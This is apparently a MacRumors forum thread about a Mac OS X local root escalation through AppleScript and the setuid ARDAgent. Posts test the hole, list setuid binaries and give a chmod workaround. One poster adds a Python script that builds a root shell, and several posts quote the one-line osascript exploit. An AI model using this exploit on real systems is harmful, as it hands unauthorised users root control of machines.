Sidebar Sidebar
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

Mac OS X Local root escalation vulnerability

zorinlynx

zorinlynx

macrumors G3
Original poster
May 31, 2007
8,436
19,220
Florida, USA
From Slashdot:

"Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not."

If you administrate Mac OS X systems in a lab environment where local users shouldn't be able to get root, this can affect you. Thankfully for most of us, the user must be logged in *locally* (into the window system) for this to work.

A quick workaround is to remove the suid bit on the ARDAgent:

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
 
Local privilege escalation.

Code: 
#!/usr/bin/python

import commands
payload="echo 'int main() { setuid(0); setgid(0); seteuid(0); system(\"/bin/sh -i\"); }' > /tmp/r00t.c"
buildcmd="gcc /tmp/r00t.c -o /tmp/r00ted"
escalate="osascript -e 'tell app \"ARDAgent\" to do shell script \"chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\"'"
print 'Building your shell', commands.getoutput(payload), commands.getoutput(buildcmd)
print commands.getoutput(escalate)

print "r00t is located at /tmp/r00ted"

Have fun.
 
Don't worry, guys, knowing Apple's serious treating of known vulnerabilities (Safari carpet bombing being the prime example), we can expect an update any year now :rolleyes:
 
There is no way of defending this - it is a massive hole and Apple should hang their heads in shame. Why the hell does ARDAgent have the SUID bit set when it can run shell scripts?!
It would be trivial to use this exploit to install a trojan with root privileges and without and secondary authentication and the question has to be are there any more of these hidden away in OS X?
The Apple world just got a bit more dangerous...
 
I would consider all binaries that Apple has given SUID bits to suspect. They've proven that they can't be trusted with them.

/System/Library/CoreServices/Expansion Slot Utility.app/Contents/Resources/PCIELaneConfigTool
/System/Library/CoreServices/Finder.app/Contents/Resources/OwnerGroupTool
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
/System/Library/CoreServices/SecurityFixer.app/Contents/Resources/securityFixerTool
/System/Library/Extensions/webdav_fs.kext/Contents/Resources/load_webdav
/System/Library/Filesystems/AppleShare/afpLoad
/System/Library/Filesystems/AppleShare/check_afp.app/Contents/MacOS/check_afp
/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/Resources/PrinterSharingTool
/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/Resources/SCHelper
/System/Library/PreferencePanes/DateAndTime.prefPane/Contents/Resources/TimeZone.prefPane/Contents/Resources/TimeZoneSettingTool
/System/Library/Printers/IOMs/LPRIOM.plugin/Contents/MacOS/LPRIOMHelper
/System/Library/Printers/Libraries/aehelper
/System/Library/Printers/Libraries/csregprinter
/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/readconfig
/System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/writeconfig
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/Locum
/System/Library/PrivateFrameworks/DiskManagement.framework/Versions/A/Resources/DiskManagementTool
/System/Library/PrivateFrameworks/Install.framework/Versions/A/Resources/runner
/System/Library/PrivateFrameworks/NetworkConfig.framework/Versions/A/Resources/NetCfgTool
Click to expand...
 
I cannot reproduce this on my Leopard system:

(spartan) ~ % osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
23:47: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)

(spartan) ~ % uname -a
Darwin spartan.example.com 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386

My copy of ARDAgent has the suid bit set but I don't appear to be vulnerable...

(spartan) ~ % ls -l /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
-rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent*


I am logged into the desktop running the above commands from terminal app.

Was this fixed in 10.5.1, 10.5.2, or 10.5.3 already?

Dan
 
Still worked with 10.5.3 for me

gamma:~ priller$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

root
 
zorinlynx said:
This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
Click to expand...
If Remote Desktop is enabled ARDAgent will already be running as the local user, launchd ignores setuid.
 
And as was said, fully exploitable via scripts. For instance, make a nicely trusted AppleScript, saved as an Application:

Code: 
on run
	do shell script "osascript -e 'tell app \"ARDAgent\" to do shell script \"say quack\"'"
end run

You'll notice that it says it with the default voice, not the one set for your account.

So how long before we see malware or trojans?
 
You don't need to use osascript if you're already in an applescript!

Code: 
on run
	tell app "ARDAgent" to do shell script \"say quack\"
end run
 
First, this should be posted on the top page of Macrumors.
Second, to SC68CAL, "do shell script" is not really the functionality of ARDagent; it is there FOR ANY SCRIPTABLE APP as a part of the AppleScript-ability and any GUI app which is registered to LaunchServices can be sent an AppleEvent.
Apple is to blame to have AppleScript-ability for the setuid apps. It's a gaping hole in the security !

In your list of setuid'ed executables, the only other GUI app is check_afp.app.
But
Code: 
osascript -e 'tell app "check_afp" to do shell script "whoami" '
didn't "work" on my machine. Mmm ...
 
For a relative Mac newbie most of the above posts read like Greek. :confused:

Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?
 
lugesm said:
For a relative Mac newbie most of the above posts read like Greek. :confused:

Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?
Click to expand...

Not really, any Malware's first goal, trojan or otherwise, is to make sure nobody can see it. This is why Windows users have such problems, even when they run all kinds of security programs: you basically have to be familiar with what's supposed to be on the system, and spot things that look fishy.
 
You must log in or register to reply here.
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.
Top Bottom
Back